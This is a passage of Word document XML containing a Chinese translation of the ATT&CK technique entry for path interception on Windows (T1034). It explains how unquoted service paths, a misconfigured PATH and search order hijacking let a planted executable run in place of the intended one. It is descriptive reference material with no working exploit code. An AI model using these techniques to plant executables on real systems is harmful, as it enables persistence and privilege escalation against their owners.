            <w:r w:rsidRPr="009C653B">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> T1034</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A22D409" w14:textId="182C2A1E" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="00DE009F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252D4B57" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55B01C00" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="602F0C35" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>有效权限</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07F42FCA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DDA0664" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId65" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="009C653B">
                <w:t>CAPEC-159</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="7033F208" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="009C653B" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t>: Stefan Kanthak</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13D91698" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="009C653B">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="009C653B">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FC0175E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="074D6B83" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>当可执行文件放置在特定路径中，以便于在应用程序不是预期目标执行时，就会发生路径拦截。这方面的一个例子是在当前工作目录中使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2891">
        <w:rPr>
          <w:b/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>的副本，该应用程序使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> CreateProcess </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>函数加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> BAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40222588" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在执行路径拦截时，对手可能会利用多个明显的弱点或配置错误：未引用的路径、路径环境变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>量错误配置和搜索顺序劫持。第一个漏洞处理完整的程序路径，而第二个和第三个在未指定程序路径时发生。如果定期调用可执行文件，这些技术可用于持久性；如果截获的可执行文件由较高特权进程启动，则可用于持久化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79069AEF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>未引用的</w:t>
      </w:r>
      <w:r>
        <w:t>路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72BC70" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>如果服务路径具有一个或多个空格，并且没有引号（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>例如，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\unsafe path with space\program.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5404">
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>vs.</w:t>
      </w:r>
      <w:r w:rsidRPr="007D5404">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>"C:\safe path with space\program.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，则（存储在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>注册表项中的）服务路径和快捷方式路径容易受到路径拦截</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>攻击者可以将可执行文件放在路径的更高级别的目录中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>将解析该可执行文件而不是预期的可执行文件。例如，如果快捷方式中的路径为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\program files\myapp.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，则攻击者可以在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>program.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>中创建程序，该程序将而非预期程序运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B3C0AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:t>PATH</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>环境变量配置错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF351DC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>环境变量包含目录列表。在未给出程序路径时</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>执行程序的某些方法（即使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或命令行）仅依赖于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> PATH </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>环境变量来确定搜索程序的位置。如果在</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>目录前的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> PATH </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>环境变量中列出了任何目录，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>%SystemRoot%\system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>（例如，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>\Windows_system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>可以放置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>程序（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>则</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>该命令从脚本或命令行执行时执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20985AC9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00707025" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>例如，从命令行执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>"net"</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>时，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\example path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> PATH </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>环境变量中位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>\Windows_system32</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，则将调用名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> net.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>并放置在</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD3E8E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
